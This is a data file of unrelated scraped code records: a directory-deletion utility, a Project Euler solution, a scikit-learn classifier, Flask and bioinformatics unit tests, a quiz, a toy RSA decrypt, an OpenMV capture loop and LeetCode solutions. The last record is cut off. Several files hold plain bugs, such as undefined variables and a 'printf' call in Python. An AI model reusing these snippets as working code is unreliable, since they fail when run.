+{"seq_id":"499529291","text":"#!/usr/bin/env python3\r\nimport os\r\nimport ctypes\r\nimport sys\r\n\r\ndef recursive_delete(dir):\r\n\r\n os.chdir(dir)\r\n curdir = os.getcwd()\r\n subdir = os.listdir(curdir)\r\n for i in range(len(subdir)):\r\n fullname = os.path.join(curdir, subdir[i])\r\n if os.path.isdir(fullname):\r\n recursive_delete(fullname)\r\n if len(os.listdir(fullname)) == 0:\r\n os.rmdir(fullname)\r\n else:\r\n print(\"File isn't empty\")\r\n else:\r\n os.remove(fullname)\r\n name = os.path.join(os.getcwd(), os.pardir)\r\n os.chdir(name)\r\n\r\ndef delete_directory():\r\n subdir = os.listdir(curdir)\r\n print(\"Which directory would you like to delete?\")\r\n for i in range(len(subdir)):\r\n print(str(i) + \": \" + subdir[i])\r\n toDelete = input()\r\n deletedir = \"\"\r\n for i in range(len(subdir)):\r\n if int(toDelete) == i or toDelete == subdir[i]:\r\n print(i)\r\n deletedir = os.path.join(curdir, subdir[i])\r\n\r\n print(\"Are you sure you want to delte \\\"\" + deletedir + \"\\\"? (you will be deleting all directories and files within this directory) y/n\")\r\n confirmation = input()\r\n if confirmation == \"y\" or confirmation == \"Y\":\r\n recursive_delete(deletedir)\r\n\r\n os.rmdir(deletedir)\r\n else:\r\n print(\"Will not delete any folders\")\r\n return\r\n\r\n\r\ndef is_admin():\r\n try:\r\n return ctypes.windll.shell32.IsUserAnAdmin()\r\n except:\r\n return False\r\n","sub_path":"delete_directory.py","file_name":"delete_directory.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"87663657","text":"#!/usr/bin/env python3\n\"\"\"\nFile Name : Problem203.py\nDate started : 2013-02-06\nDate solved : 2013-02-06\nRun Time :\n\n\nThe binomial coefficients can be arranged in triangular form, Pascal's\n triangle, like this:\n\nrow\n1 1\n2 1 1\n3 1 2 1\n4 1 3 3 1\n5 1 4 6 4 1\n6 1 5 10 10 5 1\n7 1 6 15 20 15 6 1\n8 1 7 21 35 35 21 7 1\n .........\nIt can be seen that the first eight rows of Pascal's triangle\n contain twelve distinct numbers:\n\n 1, 2, 3, 4, 5, 6, 7, 10, 15, 20, 21 and 35.\n\nA positive integer n is called squarefree if no square of a prime\n divides n. Of the twelve distinct numbers in the first eight rows\n of Pascal's triangle, all except 4 and 20 are squarefree. The sum\n of the distinct squarefree numbers in the first eight rows is 105.\n\nFind the sum of the distinct squarefree numbers in the first 51 rows of\n Pascal's triangle.\n\n\"\"\"\n\nimport project_euler\nimport itertools\nimport project_euler.number_theory\nimport project_euler.primes\n\nPROBLEM_NUMBER = 203\nSOLVED = 1\n\n\ndef isSquareFree(n, sqp):\n return len([i for i in itertools.filterfalse(lambda div: n % div, sqp)]) == 0\n\n\ndef problem203(input_=None):\n lastRow = 51\n seen = set()\n primes = project_euler.primes.get2max(lastRow ** .5)\n squarePrimes = set(map(lambda p: p ** 2, primes))\n s = 0\n for n in range(1, lastRow):\n for r in range(n // 2 + 1):\n coeff = project_euler.number_theory.choose(n, r)\n if coeff not in seen:\n seen.add(coeff)\n s += coeff * isSquareFree(coeff, squarePrimes)\n return s\n\n\ndef run():\n print(project_euler.print_timing(problem203))\n\nif __name__ == \"__main__\":\n run()\n","sub_path":"problems/Problem203.py","file_name":"Problem203.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"468305016","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn import metrics\nfrom sklearn.metrics import classification_report\nimport seaborn as sns\n\ndef feature_shrink_or_zoom(x_train,x_test):\n sc = StandardScaler()\n sc.fit(x_train)\n x_train_std = sc.transform(x_train)\n x_test_std = sc.transform(x_test)\n return x_train_std, x_test_std\n\ndef logistic_reg_train(x_train_std, y_train):\n lr = LogisticRegression(solver='liblinear')\n lr.fit(x_train_std, y_train)\n return lr\n\ndef get_logistic_reg_predict_probability(x_test_std, lr):\n return lr.predict_proba(x_test_std)\n\ndef bayes_inference_train(x_train_std, y_train):\n bnb = BernoulliNB()\n bnb.fit(x_train_std, y_train)\n return bnb\n\ndef get_correct_rate(classfication, x_test_std, y_test):\n classfication.predict(x_test_std)\n error = 0\n num_of_data = 0\n for i, v in enumerate(classfication.predict(x_test_std)):\n num_of_data += 1\n if v != y_test.iloc[i,]:\n error += 1\n correct_rate = 1 - (error/num_of_data)\n return correct_rate\n\ndef cut_train_test_data(x, y):\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=0)\n return x_train, x_test, y_train, y_test\n\ndef get_GOT_GPT_ratio(GOT, GPT):\n GOT_GPT_ratio = GOT/GPT\n return GOT_GPT_ratio\n\ndef data_correlation(Selector,GOT_GPT_ratio):\n GOT_GPT_data_correlation = GOT_GPT_ratio.corr(Selector)\n return GOT_GPT_data_correlation\n\ndef run_data(x,y):\n x_train, x_test, y_train, y_test = cut_train_test_data(x, y)\n x_train_std, x_test_std = feature_shrink_or_zoom(x_train, x_test)\n lr = logistic_reg_train(x_train_std, y_train)\n lr_correct_rate = get_correct_rate(lr, x_test_std, y_test)\n bnb = bayes_inference_train(x_train_std, y_train)\n bnb_correct_rate = get_correct_rate(bnb, x_test_std, y_test)\n return lr, lr_correct_rate,bnb, bnb_correct_rate\n\ndef get_mean_squared_log_error(reg_kind,x, y):\n x_train, x_test, y_train, y_test = cut_train_test_data(x, y)\n y_pred = reg_kind.predict(x_test)\n mean_squared_log_error = metrics.mean_squared_log_error(y_test,y_pred)\n return mean_squared_log_error\n\ndef main():\n data = pd.read_csv('liver.csv')\n x, y = data.iloc[0:, 0:6], data.iloc[0:, 6]\n lr, lr_correct_rate, bnb, bnb_correct_rate = run_data(x,y)\n lr_msle = get_mean_squared_log_error(lr, x, y)\n bnb_msle = get_mean_squared_log_error(bnb, x, y)\n print('lr_correct_rate:', lr_correct_rate)\n print('bnb_correct_rate:', bnb_correct_rate)\n print ('lr_mean_squared_log_error:', ls_msle)\n print('bnb_mean_squared_log_error:', bnb_msle)\n\n\n GOT = data.iloc[0:, 3]\n GPT = data.iloc[0:, 2]\n GOT_GPT_ratio = get_GOT_GPT_ratio(GOT, GPT)\n GPT_GOT_ratio = get_GOT_GPT_ratio(GPT, GOT)\n data.iloc[0:, 3] = GOT_GPT_ratio\n data.iloc[0:, 2] = GPT_GOT_ratio\n x_changed = data.iloc[0:,0:6]\n x_changed_only_GOT_GPT_ratio = data.iloc[0:,[0, 1, 3, 4, 5]]\n x_changed_only_GPT_GOT_ratio = data.iloc[0:, [0, 1, 2, 4, 5]]\n lr_correct_rate_changed, bnb_correct_rate_changed = run_data(x_changed, y)\n print('lr_correct_rate_changed:', lr_correct_rate_changed)\n print('bnb_correct_rate_changed:', bnb_correct_rate_changed)\n lr_correct_rate_changed, bnb_correct_rate_changed = run_data(x_changed_only_GOT_GPT_ratio, y)\n print('mean square error:', get_mean_squared_log_error(reg_kind,x, y))\n\n print('lr_correct_rate_changed_GOT_GPT_ratio:', lr_correct_rate_changed)\n print('bnb_correct_rate_changed_GPT_GOT_ratio:', bnb_correct_rate_changed)\n lr_correct_rate_changed, bnb_correct_rate_changed = run_data(x_changed_only_GPT_GOT_ratio, y)\n print('lr_correct_rate_changed:', lr_correct_rate_changed)\n print('bnb_correct_rate_changed:', bnb_correct_rate_changed)\n GPT_GOT_ratio_corrwith_selector = data_correlation(y, GPT_GOT_ratio)\n GOT_GPT_ratio_corrwith_selector = data_correlation(y, GOT_GPT_ratio)\n GPT_corrwith_selector = data_correlation(y,GPT)\n GOT_corrwith_selector = data_correlation(y,GOT)\n print('GPT_GOT_ratio_corrwith_selector:', GPT_GOT_ratio_corrwith_selector)\n print('GOT_GPT_ratio_corrwith_selector:', GOT_GPT_ratio_corrwith_selector)\n print('GPT_corrwith_selector:',GPT_corrwith_selector)\n print('GOT_corrwith_selector:',GOT_corrwith_selector)\n\n\nmain()","sub_path":"logistic_selector.py","file_name":"logistic_selector.py","file_ext":"py","file_size_in_byte":4505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"460670129","text":"# ----------------------------------------------------------------------------\n# Copyright (c) 2015--, micronota development team.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file COPYING.txt, distributed with this software.\n# ----------------------------------------------------------------------------\n\nfrom tempfile import mkdtemp\nfrom os import getcwd\nfrom shutil import rmtree\nfrom os.path import join\nfrom unittest import TestCase, main\nfrom functools import partial\nfrom skbio.util import get_data_path\nfrom burrito.util import ApplicationError\n\nfrom micronota.bfillings.minced import MinCED, predict_crispr\n\n\nclass MinCEDTests(TestCase):\n def setUp(self):\n self.temp_dir = mkdtemp()\n self.get_minced_path = partial(\n get_data_path, subfolder=join('data', 'minced'))\n\n # taken from MinCED test files\n self.positive_fps = list(map(self.get_minced_path,\n ['Aquifex_aeolicus_VF5.fna',\n 'Aquifex_aeolicus_VF5.fna',\n 'Aquifex_aeolicus_VF5.fna']))\n # 'empty' file raises JAVA (minced) error\n self.negative_fps = list(map(get_data_path, [\n 'whitespace_only',\n 'empty']))\n self.positive_params = [\n {'-searchWL': '8'},\n {'-searchWL': '8', '-minNR': '3'},\n {}]\n self.positive_flags = [\n {'gff': True, 'gffFull': False, 'spacers': False},\n {'gffFull': True, 'gff': False, 'spacers': False},\n {'gff': True, 'spacers': True, 'gffFull': False}]\n self.positive_prefix = 'Aquifex_aeolicus_VF5'\n\n def test_base_command(self):\n c = MinCED()\n self.assertEqual(\n c.BaseCommand,\n 'cd \"%s/\"; %s' % (getcwd(), c._command))\n\n def test_predict_crispr_wrong_input(self):\n for fp in self.negative_fps:\n with self.assertRaisesRegex(\n ApplicationError,\n r'Error constructing CommandLineAppResult.'):\n predict_crispr(fp, self.temp_dir, 'foo')\n\n def test_predict_crispr(self):\n for fp, params, flags in zip(self.positive_fps, self.positive_params,\n self.positive_flags):\n prefix = self.positive_prefix\n res = predict_crispr(fp, self.temp_dir,\n prefix,\n gff=flags['gff'],\n gffFull=flags['gffFull'],\n spac=flags['spacers'], params=params)\n self.assertEqual(res['ExitStatus'], 0)\n if flags['gff']:\n suffix = 'gff'\n elif flags['gffFull']:\n suffix = 'gffFull'\n else:\n suffix = 'crisprs'\n fp = self.get_minced_path('.'.join([prefix, suffix]))\n with open(fp) as f:\n self.assertEqual(\n # skip comment lines as some contain runtime info\n [i for i in f.readlines()\n if not i.startswith('Time')],\n [j for j in res['output'].readlines()\n if not j.startswith('Time')])\n # SPACERS flag produces an *additional* OUT_spacers.fa file\n # other flags produce OUT.FLAG outputs\n if flags['spacers']:\n suffix = 'spacers.fa'\n fp = self.get_minced_path('_'.join([prefix, suffix]))\n with open(fp) as f:\n self.assertEqual(f.read(), res['spacers'].read())\n res['StdOut'].close()\n res['StdErr'].close()\n\n def tearDown(self):\n # remove the tempdir and contents\n rmtree(self.temp_dir)\n\nif __name__ == '__main__':\n main()\n","sub_path":"micronota/bfillings/tests/test_minced.py","file_name":"test_minced.py","file_ext":"py","file_size_in_byte":3855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"348898526","text":"# -*- coding: utf-8 -*-\n'''\n检测数据是否已在csv文件中存在\n'''\nimport CsvOperation\nclass CheckRepeated:\n def checkrepeated(self,filename,tocheckdatas):\n csvoperation=CsvOperation()\n __contents=[]\n #获取除了ismailed以外的数据用于比对\n __contents=csvoperation.csvgetlines(filename,-2)\n for tocheckdata in tocheckdatas:\n if tocheckdata in __contents:\n return True\n else:\n return False\n","sub_path":"CheckRepeated.py","file_name":"CheckRepeated.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"190756030","text":"\"\"\"Message View tests.\"\"\"\nimport os\nfrom unittest import TestCase\n\nfrom models import db, connect_db, Message, User\n\nos.environ['DATABASE_URL'] = \"postgresql:///warbler-test\"\n\nfrom app import app, CURR_USER_KEY\n\ndb.create_all()\n\napp.config['WTF_CSRF_ENABLED'] = False\n\n\nclass MessageViewTestCase(TestCase):\n \"\"\"Test views for messages.\"\"\"\n\n def setUp(self):\n \"\"\"Create test client, add sample data.\"\"\"\n\n db.drop_all()\n db.create_all()\n\n self.client = app.test_client()\n\n self.testuser = User.signup(username=\"testuser\",\n email=\"test@test.com\",\n password=\"password\",\n image_url=None\n )\n\n self.testuser_id = 12345\n self.testuser.id = self.testuser_id \n\n db.session.commit()\n\n\n def tearDown(self):\n res = super().tearDown()\n db.session.rollback()\n return res\n\n\n def test_add_message(self):\n \"\"\"Can use add a message?\"\"\"\n # Since we need to change the session to mimic logging in,\n # we need to use the changing-session trick:\n\n with self.client as c:\n with c.session_transaction() as sess:\n sess[CURR_USER_KEY] = self.testuser.id\n\n # Now, that session setting is saved, so we can have\n # the rest of ours test\n\n resp = c.post(\"/messages/new\", data={\"text\": \"Hello\"})\n\n # Make sure it redirects\n self.assertEqual(resp.status_code, 302)\n\n msg = Message.query.one()\n self.assertEqual(msg.text, \"Hello\")\n \n\n\n def test_add_no_session(self):\n \"\"\"Test add a message without session\"\"\"\n with self.client as c:\n resp = c.post(\"/messages/new\", data={\"text\": \"Hello\"}, follow_redirects=True)\n self.assertEqual(resp.status_code, 200)\n self.assertIn(\"Access unauthorized\", str(resp.data))\n\n\n \n def test_add_invalid_user(self):\n \"\"\"Test add a message with invalid user\"\"\"\n with self.client as c:\n with c.session_transaction() as sess:\n sess[CURR_USER_KEY] = 999999999\n # user does not exist\n resp = c.post(\"/messages/new\", data={\"text\": \"Hello\"}, follow_redirects=True)\n self.assertEqual(resp.status_code, 200)\n self.assertIn(\"Access unauthorized\", str(resp.data))\n\n\n\n def test_message_show(self):\n \"\"\"Test showing a message\"\"\" \n m = Message(\n id=1234,\n text=\"a test message\",\n user_id=self.testuser_id\n )\n\n db.session.add(m)\n db.session.commit()\n\n with self.client as c:\n with c.session_transaction() as sess:\n sess[CURR_USER_KEY] = self.testuser.id\n\n m = Message.query.get(1234)\n\n resp = c.get(f'/messages/{m.id}')\n\n self.assertEqual(resp.status_code, 200)\n self.assertIn(m.text, str(resp.data))\n\n\n\n def test_invalid_message_show(self):\n \"\"\"Test invalid message\"\"\" \n with self.client as c:\n with c.session_transaction() as sess:\n sess[CURR_USER_KEY] = self.testuser.id\n\n resp = c.get('/messages/9999999')\n\n self.assertEqual(resp.status_code, 404)\n\n\n\n def test_delete_message(self):\n \"\"\"Test delete message\"\"\"\n m = Message(\n id=1234,\n text=\"a test message\",\n user_id=self.testuser_id\n )\n\n db.session.add(m)\n db.session.commit()\n\n with self.client as c:\n with c.session_transaction() as sess:\n sess[CURR_USER_KEY] = self.testuser.id\n \n resp = c.post('/messages/1234/delete', follow_redirects=True)\n self.assertEqual(resp.status_code, 200)\n\n m = Message.query.get(1234)\n self.assertIsNone(m)\n\n\n\n def test_unauthorized_message_delete(self):\n \"\"\"Test unauthorized message delete\"\"\"\n\n u2 = User.signup(username=\"testuser_two\",\n email=\"test_two@test.com\",\n password=\"password\",\n image_url=None\n )\n u2.id = 98765\n\n m = Message(\n id=1234,\n text=\"a test message\",\n user_id=self.testuser_id\n )\n\n db.session.add_all([u2, m])\n db.session.commit()\n\n with self.client as c:\n with c.session_transaction() as sess:\n sess[CURR_USER_KEY] = 98765\n \n resp = c.post('/messages/1234/delete', follow_redirects=True)\n self.assertEqual(resp.status_code, 200)\n self.assertIn(\"Access unauthorized\", str(resp.data))\n\n m = Message.query.get(1234)\n self.assertIsNotNone(m)\n\n","sub_path":"test_message_views.py","file_name":"test_message_views.py","file_ext":"py","file_size_in_byte":4909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"100965520","text":"'''\nQUIZ MASTER PROJECT\n-------------------\nThe criteria for the project are on the website. Make sure you test this quiz with \ntwo of your student colleagues before you run it by your instructor.\n\n7-10 question quiz about whatever I have on my mind\n'''\n\ncount = 0\n\ndef correct(): #subroutine for when the user gets the question correct, so I dont have to type everything out every single time\n print('\\nThat is the correct answer.')\n global count\n count = count + 1\n\ndef incorrect(): #subroutine for when the user gets the question incorrect\n print('\\nThat is not the correct answer.')\n\nprint('\\nWhich of the following is my least favorite class?\\nA) AP Government\\nB) Advanced Composition\\nC) Both')\nanswer = input('Enter answer HERE: ') #question 1\nif answer.upper() == 'C' or answer.upper() == 'BOTH':\n correct()\nelse:\n incorrect()\n\nprint('\\nWhat is the name of my favorite robot?') #question 2\nanswer = input('Enter answer HERE: ')\nif answer.upper() == 'TOM' or answer.upper() == 'TOM 2.0':\n correct()\nelse:\n incorrect()\n\nprint('\\nYES/NO: Is League of Legends a fun game?') #question 3\nanswer = input('Enter answer HERE: ')\nif answer.upper() == 'NO' or answer.upper() == 'ABSOLUTELY NOT':\n correct()\nelse:\n incorrect()\n\nprint('\\nYES/NO: Is it easy to think of these questions?') #question 4\nanswer = input('Enter answer HERE: ')\nif answer.upper() == 'NO':\n correct()\nelse:\n incorrect()\n\nprint('\\nWhat are the derived units (mks) of length?') #question 5\nanswer = input('Enter answer HERE: ')\nif answer.upper() == 'M' or answer.upper() == 'METERS':\n correct()\nelse:\n incorrect()\n\nprint('\\nWhat is 2+2*4?')\nanswer = int(input('Enter answer HERE: ')) #question 6\nif answer == 10:\n correct()\nelse:\n incorrect()\n\nprint('\\nWhich of the following colors is the most sus?\\nA) Cyan\\nB) Red\\nC) Green\\nD) Yellow')\nanswer = input('Enter answer HERE: ') #question 7\nif answer.upper() == 'B' or answer.upper() == 'RED':\n correct()\nelse:\n incorrect()\n\nprint('\\nWhich of the following is superior?\\nA) PC\\nB) Mac') #question 8\nanswer = input('Enter answer HERE: ')\nif answer.upper() == 'A' or answer.upper() == 'PC':\n correct()\nelse:\n incorrect()\n\npercentage = (count/8)*100\n\ntext = 'Your quiz grade is '\nif percentage >= 90: #Dont make me comment the if/else because you and I both know how they work\n print('\\nCongratulations! '+text+'an A, '+str(percentage)+'%')\n\nelif percentage < 90 and percentage >= 80:\n print('\\n'+text+'a B, '+str(percentage)+'%')\n\nelif percentage < 80 and percentage >= 70:\n print('\\n'+text+'a C, '+str(percentage)+'%')\n\nelif percentage <70 and percentage >= 60:\n print('\\n'+text+'a D, '+str(percentage)+'%')\n\nelse:\n print('\\n'+text+str(percentage)+\"%. I honestly don't know how you got here.\")\n","sub_path":"4.3_Quiz_Master.py","file_name":"4.3_Quiz_Master.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"302482616","text":"import numpy as np\nimport mrc_functions as mrc\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport statsmodels.api as sm\nfrom scipy.stats import beta as bt\nplt.style.use('seaborn-white')\n\n################################\n#### We Create the Data set ###\n\ndef calculate_example1(sigma=1, n=100):\n beta0=[2,-1,1,0]\n beta0=mrc.normalize(beta0)\n x = np.random.normal(0, 1, [n,4])\n epsilon=sigma*np.random.lognormal(0,1,n)\n Ix=np.dot(x,beta0)\n y=(Ix*epsilon)/(1+np.exp(-Ix+epsilon))\n\n #### solving the ori\n beta_ini = np.random.uniform(-1, 1, 4)\n beta_ori, tauback, iteration = mrc.ori(y, x, 4, 200, beta_ini)\n Ixback=np.dot(x,beta_ori)\n\n\n #solving the glm\n xx = sm.add_constant(x)\n Gaussian_model = sm.GLM(y, xx, family=sm.families.Gaussian())\n Gaussian_results = Gaussian_model.fit()\n beta_glm = mrc.normalize(Gaussian_results.params[1:])\n\n cosglm=np.abs(np.dot(beta0,beta_glm))\n cosori=np.abs(np.dot(beta0,beta_ori))\n deltacos=cosori-cosglm\n\n\n return(cosori, cosglm,deltacos)\n\ntrials=1000\nn=100\nfor sigma in [.5]:\n print(sigma)\n dc=np.zeros((trials,3))\n for i in np.arange(trials):\n dc[i,:]=calculate_example1(sigma, n)\n print(sigma, i)\n\npdc=pd.DataFrame(dc)\npdc.columns=['cos_ori', 'cos_glm', 'delta_cos']\nname='data/example1b_'+str(sigma)+'.csv'\npdc.to_csv(name)\n\npdc=pd.read_csv(name)\n\n\nplt.hist(pdc['cos_glm'], color='mediumseagreen', label='GLM')\nplt.hist(pdc['cos_ori'], color='steelblue', label='ORI')\nplt.xlabel('Cosine Similarity')\nplt.ylabel('Frequency')\nplt.legend(loc='best')\nplt.savefig('../example_1b_dec2019.png')\nplt.show()\n\n","sub_path":"01_Index_example1b.py","file_name":"01_Index_example1b.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"603688321","text":"# -*- coding:utf-8 -*-\n\n__author__ = [\n '\"liubo\" '\n]\n\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def deleteNode(self, node):\n \"\"\"\n :type node: ListNode\n :rtype: void Do not return anything, modify node in-place instead.\n \"\"\"\n p = node\n\n if p.next:\n p.val = p.next.val\n p.next = p.next.next\n","sub_path":"237_delete_node_in_a_linked_list.py","file_name":"237_delete_node_in_a_linked_list.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"517469475","text":"import json\n\ndef decrypt():\n # Decrypts a message\n\n print(\"\\n...\")\n\n # Load Public Key and Private Key from 'keys.json'\n file = open('./resources/keys.json',)\n keys = json.load(file)\n file.close()\n n = keys[\"public\"][\"n\"]\n d = keys[\"private\"][\"d\"]\n if n and d:\n print(\"Private Key successfully loaded!\")\n else:\n print(\"Error: Private Key not found\")\n\n\n # Load cipher from 'cipher.txt'\n with open('./resources/cipher.txt') as file:\n cipher = file.read()\n if cipher:\n print(\"Cipher successfully loaded!\")\n else:\n print(\"Error: Cipher not found\")\n\n\n # Perform RSA Decryption\n plaintext = \"\"\n ciphersplit = cipher.split()\n for character in ciphersplit:\n x = int(character) #transform unicode to letter\n plaintext += chr(pow(x, d, n))\n if plaintext:\n print(\"Message successfully generated!\")\n else:\n print(\"Error: Message could not be generated\")\n\n\n # Save encrypted text in cipher.txt\n with open('./resources/message.txt', 'w') as file:\n file.write(plaintext)\n if plaintext:\n print(\"Message successfully saved!\")\n else:\n print(\"Error: Message could not be saved\")\n \n print(\"...\")\n\n","sub_path":"lib/decrypt.py","file_name":"decrypt.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"388984112","text":" # Hello World Example\n#\n# Welcome to the OpenMV IDE! Click on the green run arrow button below to run the script!\n\nimport sensor, image, time, pyb\n\nsensor.reset() # Reset and initialize the sensor.\nsensor.set_pixformat(sensor.GRAYSCALE) # Set pixel format to RGB565 (or GRAYSCALE)\nsensor.set_framesize(sensor.VGA) # Set frame size to QVGA (320x240)\n#sensor.set_windowing((640, 80))\nsensor.skip_frames(time = 500) # Wait for settings take effect.\nclock = time.clock() # Create a clock object to track the FPS.\ngreen_led=pyb.LED(2);\n\nwhile(True):\n #pyb.delay(100)\n clock.tick() # Update the FPS clock.\n img = sensor.snapshot() # Take a picture and return the image.\n hist=img.get_histogram()\n th=hist.get_threshold()\n #img.binary([(th,255)])\n printf(\"Hola\")\n green_led.toggle()\n print(clock.fps()) # Note: OpenMV Cam runs about half as fast when connected\n # to the IDE. The FPS should increase once disconnected.\n","sub_path":"Primeras pruebas/00 Ejemplo captura.py","file_name":"00 Ejemplo captura.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"135452358","text":"import pytest\n\nfrom nplinker.metabolomics.gnps.gnps_file_mapping_loader import GNPSFileMappingLoader\nfrom tests import DATA_DIR\n\n@pytest.fixture\ndef loader() -> GNPSFileMappingLoader:\n filename = DATA_DIR / \"nodes.tsv\"\n return GNPSFileMappingLoader(filename)\n\ndef test_default(loader):\n assert loader is not None\n\n@pytest.mark.parametrize(\"filename, expected_length, spectrum_id, samples\", [\n [DATA_DIR / \"nodes_fbmn_mwe.csv\", 9, \"301\", [\"20210623_10_9A_1uL.mzML\", \"20210623_16_9C_1uL.mzML\", \"20210623_12_5B_1uL.mzML\", \"20210623_13_9B_1uL.mzML\"]],\n [DATA_DIR / \"nodes_fbmn_mwe.csv\", 9, \"1465\", [\"20210623_10_9A_1uL.mzML\", \"20210623_16_9C_1uL.mzML\"]],\n [DATA_DIR / \"nodes_fbmn.csv\", 994, \"304\", [\"20210623_10_9A_1uL.mzML\", \"20210623_16_9C_1uL.mzML\", \"20210623_13_9B_1uL.mzML\"]],\n [DATA_DIR / \"nodes_mwe.csv\", 13, \"275\", [\"26c.mzXML\", \"26c.mzXML\", \"26c.mzXML\"]],\n [DATA_DIR / \"nodes.tsv\", 25935, \"223\", [\"26c.mzXML\", \"26c.mzXML\", \"26c.mzXML\"]]\n])\ndef test_load_mapping(filename, expected_length, spectrum_id, samples):\n sut = GNPSFileMappingLoader(str(filename))\n actual = sut.mapping()\n\n assert actual[spectrum_id] == samples\n assert len(actual) == expected_length\n","sub_path":"tests/metabolomics/test_gnps_file_mapping_loader.py","file_name":"test_gnps_file_mapping_loader.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"386706885","text":"from collections import Counter, defaultdict, OrderedDict, deque\nfrom bisect import bisect_left, bisect_right\nfrom functools import reduce, lru_cache\nfrom typing import List\nimport itertools\nimport math\nimport heapq\nimport string\ntrue = True\nfalse = False\nMIN, MAX, MOD = -0x3f3f3f3f, 0x3f3f3f3f, 1000000007\n#\n# @lc app=leetcode id=1559 lang=python3\n#\n# [1559] Detect Cycles in 2D Grid\n#\n# https://leetcode.com/problems/detect-cycles-in-2d-grid/description/\n#\n# algorithms\n# Hard (41.58%)\n# Total Accepted: 3.7K\n# Total Submissions: 8.8K\n# Testcase Example: '[[\"a\",\"a\",\"a\",\"a\"],[\"a\",\"b\",\"b\",\"a\"],[\"a\",\"b\",\"b\",\"a\"],[\"a\",\"a\",\"a\",\"a\"]]'\n#\n# Given a 2D array of characters grid of size m x n, you need to find if there\n# exists any cycle consisting of the same value in grid.\n#\n# A cycle is a path of length 4 or more in the grid that starts and ends at the\n# same cell. From a given cell, you can move to one of the cells adjacent to it\n# - in one of the four directions (up, down, left, or right), if it has the\n# same value of the current cell.\n#\n# Also, you cannot move to the cell that you visited in your last move. For\n# example, the cycle (1, 1) -> (1, 2) -> (1, 1) is invalid because from (1, 2)\n# we visited (1, 1) which was the last visited cell.\n#\n# Return true if any cycle of the same value exists in grid, otherwise, return\n# false.\n#\n#\n# Example 1:\n#\n#\n#\n#\n# Input: grid =\n# [[\"a\",\"a\",\"a\",\"a\"],[\"a\",\"b\",\"b\",\"a\"],[\"a\",\"b\",\"b\",\"a\"],[\"a\",\"a\",\"a\",\"a\"]]\n# Output: true\n# Explanation: There are two valid cycles shown in different colors in the\n# image below:\n#\n#\n#\n# Example 2:\n#\n#\n#\n#\n# Input: grid =\n# [[\"c\",\"c\",\"c\",\"a\"],[\"c\",\"d\",\"c\",\"c\"],[\"c\",\"c\",\"e\",\"c\"],[\"f\",\"c\",\"c\",\"c\"]]\n# Output: true\n# Explanation: There is only one valid cycle highlighted in the image below:\n#\n#\n#\n# Example 3:\n#\n#\n#\n#\n# Input: grid = [[\"a\",\"b\",\"b\"],[\"b\",\"z\",\"b\"],[\"b\",\"b\",\"a\"]]\n# Output: false\n#\n#\n#\n# Constraints:\n#\n#\n# m == grid.length\n# n == grid[i].length\n# 1 <= m <= 500\n# 1 <= n <= 500\n# grid consists only of lowercase English letters.\n#\n#\n#\ndirs = [-1, 0, 1, 0, -1]\n\n\ndef pair2id(i, j):\n return i * 500 + j\n\n\nclass Solution:\n def is_cycle(self, g, i, j, a, b):\n self.visited.add(pair2id(i, j))\n for d in range(4):\n ni, nj = i + dirs[d], j + dirs[d + 1]\n if 0 <= ni < len(g) and 0 <= nj < len(\n g[0]) and (ni != a or nj != b) and g[i][j] == g[ni][nj]:\n if pair2id(ni, nj) in self.visited or self.is_cycle(\n g, ni, nj, i, j):\n return True\n return False\n\n def containsCycle(self, g: List[List[str]]) -> bool:\n self.visited = set()\n n, m = len(g), len(g[0])\n for i in range(n):\n for j in range(m):\n cid = i * 500 + j\n if cid not in self.visited and self.is_cycle(g, i, j, -1, -1):\n return True\n return False\n\n\nsol = Solution()\n\ngrid = [[\"a\", \"a\", \"a\", \"a\"], [\"a\", \"b\", \"b\", \"a\"], [\"a\", \"b\", \"b\", \"a\"],\n [\"a\", \"a\", \"a\", \"a\"]]\ngrid = [[\"c\", \"c\", \"c\", \"a\"], [\"c\", \"d\", \"c\", \"c\"], [\"c\", \"c\", \"e\", \"c\"],\n [\"f\", \"c\", \"c\", \"c\"]]\ngrid = [[\"a\", \"b\", \"b\"], [\"b\", \"z\", \"b\"], [\"b\", \"b\", \"a\"]]\nprint(sol.containsCycle(grid))\n","sub_path":"python_solutions/1559.detect-cycles-in-2d-grid.py","file_name":"1559.detect-cycles-in-2d-grid.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"507771604","text":"from app import client\nfrom bson.objectid import ObjectId\nimport logging\nclass db():\n \n client 